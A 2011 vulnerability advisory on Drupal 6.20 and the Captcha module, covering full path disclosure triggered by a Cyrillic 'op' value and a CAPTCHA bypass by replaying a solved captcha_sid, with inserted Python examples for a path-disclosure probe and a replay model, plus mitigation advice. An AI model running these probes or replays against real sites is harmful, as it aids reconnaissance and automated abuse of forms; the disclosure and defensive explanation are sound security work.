Drupal Broken Anti-Automation / Path Disclosure

Posted Feb 16, 2011
Authored by MustLive

Drupal versions 6.20 and below suffer from broken anti-automation and path disclosure vulnerabilities.

tags | advisory, vulnerability
SHA-256 | 998d6854d0553d84a23f01ebfab42858ac12d515cef3a3c74af722f5b84febca

Hello list!

I want to warn you about Full Path Disclosure and Insufficient
Anti-automation vulnerabilities in Drupal.

-------------------------
Affected products:
-------------------------

Drupal 6.20 and earlier versions are vulnerable.

Versions of the Captcha module before 6.x-2.3 and 7.x-1.0 are vulnerable.

----------
Details:
----------

Full Path Disclosure (WASC-13):

When a form is submitted by POST with a Cyrillic character in the op
parameter, Drupal displays an error message that contains the full filesystem
path of the affected script.

The vulnerability exists on the pages http://site/user/,
http://site/user/1/edit, http://site/user/password,
http://site/user/register, http://site/contact and
http://site/user/1/contact. Other pages that contain forms may also be
vulnerable.

Exploit:

http://websecurity.com.ua/uploads/2011/Drupal%20Full%20path%20disclosure.html

As the Drupal developers noted, these disclosures occur because a debugging
option is enabled in the administration panel (in Drupal 6 this is the error
reporting setting, which should write errors to the log only, not to the
screen). Turning that option off prevents these and other full path
disclosures on the site.
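The following is an added example, not part of the original advisory: it builds the POST body the advisory describes (a Cyrillic value in the op parameter) and scans the server's reply for a PHP-style error line that leaks an absolute filesystem path. The form_id value, the sample response and the regular expression for the leaked path are assumptions made for the demonstration; the network probe is optional and is not run by default.

```python
"""Probe helper for the Drupal full path disclosure described above.
Added example; the form_id, the constructed sample reply and the path
pattern are assumptions, not taken from the advisory or from Drupal."""
import re
import urllib.request
from urllib.parse import urlencode

# PHP warnings rendered to the screen usually carry the script path as
# "in /abs/path/file.php on line N" (or a Windows drive path).
# Assumption: the leaked path appears in that form.
_PATH_RE = re.compile(
    r"in ((?:/[^\s:<>\"']+)+\.(?:php|inc|module)"
    r"|[A-Za-z]:\\[^\s<>\"']+\.(?:php|inc|module)) on line (\d+)"
)


def build_probe_body(form_id, extra=None):
    """Return the urlencoded POST body for a Drupal form whose submit button
    value (the op parameter) is replaced by a Cyrillic string, percent-encoded
    as UTF-8."""
    fields = {"form_id": form_id, "op": "Отправить"}  # Cyrillic "Submit"
    if extra:
        fields.update(extra)
    return urlencode(fields, encoding="utf-8")


def find_path_disclosure(body):
    """Return (path, line) pairs for every leaked filesystem path in body."""
    return [(m.group(1), int(m.group(2))) for m in _PATH_RE.finditer(body)]


# Constructed sample reply (not a real Drupal message): the shape of a PHP
# warning written to the screen instead of the log.
SAMPLE_RESPONSE = """<div class="messages error">
warning: example warning in /var/www/html/includes/form.inc on line 123.
</div>"""


def probe(url, form_id, opener=urllib.request.urlopen):
    """POST the probe body to url and report leaked paths. Only call this
    against a system you are authorised to test; nothing is sent unless the
    caller invokes it."""
    data = build_probe_body(form_id).encode("ascii")
    req = urllib.request.Request(url, data=data, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    with opener(req) as resp:
        return find_path_disclosure(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    print(build_probe_body("contact_mail_page"))  # form_id is an assumption
    print(find_path_disclosure(SAMPLE_RESPONSE))
```

If find_path_disclosure returns anything for a live reply, the site is writing errors to the screen and the error reporting option described above should be changed; an empty result after the change is the check that the fix took effect.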

Insufficient Anti-automation (WASC-21):

Various Drupal forms rely on a CAPTCHA that can be bypassed. The Captcha
module itself is vulnerable, so every CAPTCHA plugin built on it can be
vulnerable too. To bypass the CAPTCHA, an attacker submits a valid
captcha_sid together with the captcha_response already accepted for it. This
bypass method is described in my Month of Bugs in Captchas project
(http://websecurity.com.ua/1498/). The attack works for as long as that
captcha_sid value remains active.

The vulnerability exists on the pages with forms http://site/contact,
http://site/user/1/contact, http://site/user/password and
http://site/user/register. Other forms that use the CAPTCHA will be
vulnerable as well.
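The following is an added example, not code from the advisory, from Drupal or from the Captcha module: a minimal model of server-side CAPTCHA session validation that shows why a solved captcha_sid/captcha_response pair can be replayed while the session is active, and what a single-use session changes. Class, method and field names are assumptions; the challenge solution is constructed.

```python
"""Model of CAPTCHA session handling for the replay bypass described above.
Added example; this is not the Captcha module's actual code or patch."""
import secrets
import time


class CaptchaSessions:
    """In-memory stand-in for a captcha_sessions table (assumed layout)."""

    def __init__(self, ttl=3600, now=time.time):
        self.ttl = ttl
        self.now = now          # injectable clock so expiry can be tested
        self._s = {}            # sid -> {"solution", "expires", "solved"}

    def create(self, solution):
        sid = secrets.token_hex(8)
        self._s[sid] = {"solution": solution,
                        "expires": self.now() + self.ttl,
                        "solved": False}
        return sid

    def _active(self, sid):
        s = self._s.get(sid)
        return s if s and s["expires"] > self.now() else None

    @staticmethod
    def _matches(s, response):
        return secrets.compare_digest(s["solution"].encode(), response.encode())

    # Vulnerable behaviour: a correct (sid, response) pair keeps validating
    # until the session expires, so one human solve feeds a script.
    def validate_replayable(self, sid, response):
        s = self._active(sid)
        return bool(s) and self._matches(s, response)

    # Hardened behaviour: the session is consumed on the first correct
    # answer, so the same pair is rejected on every later submission.
    def validate_single_use(self, sid, response):
        s = self._active(sid)
        if not s or s["solved"] or not self._matches(s, response):
            return False
        s["solved"] = True
        return True


def replay_attack(validate, sid, response, submissions=5):
    """Resubmit one solved pair `submissions` times; return how many pass."""
    return sum(1 for _ in range(submissions) if validate(sid, response))


def demo():
    """Solve once, then replay against both validators."""
    store = CaptchaSessions()
    sid = store.create("7k3pq")            # constructed challenge solution
    accepted_vuln = replay_attack(store.validate_replayable, sid, "7k3pq")
    sid2 = store.create("7k3pq")
    accepted_fixed = replay_attack(store.validate_single_use, sid2, "7k3pq")
    return accepted_vuln, accepted_fixed   # (5, 1)


if __name__ == "__main__":
    print("accepted submissions (replayable, single-use):", demo())
```

The advisory only states that the Captcha module was fixed in 2010; the single-use validator here illustrates the property a fixed module must have (one solve, one accepted submission), not the module's actual patch. Note that single-use sessions alone do not help a form that ships with no CAPTCHA at all, which is the second half of the problem described below.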

Because the Captcha module is a third-party module, the Insufficient
Anti-automation vulnerability exists both in the Captcha module (CAPTCHA
bypass) and in Drupal itself (no CAPTCHA at all by default). The result is a
"forever vulnerable" condition: a default Drupal installation is vulnerable
to IAA, and the Captcha module is also vulnerable to IAA (although the Captcha
module was already fixed in 2010, so updating it to the latest version is
recommended).

Exploit:

http://websecurity.com.ua/uploads/2011/Drupal%20CAPTCHA%20bypass.html

------------
Timeline:
------------

2010.12.10 - announced on my site.
2010.12.11 - informed the developers.
2010.12.11 - response from the Drupal security team.
2010.12.12 - I drew the attention of the Drupal security team to the fact
that IAA holes existed not only in the Captcha module but in Drupal itself
(so it concerned Drupal too).
2011.02.15 - disclosed on my site.

I mentioned these vulnerabilities on my site
(http://websecurity.com.ua/4749/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
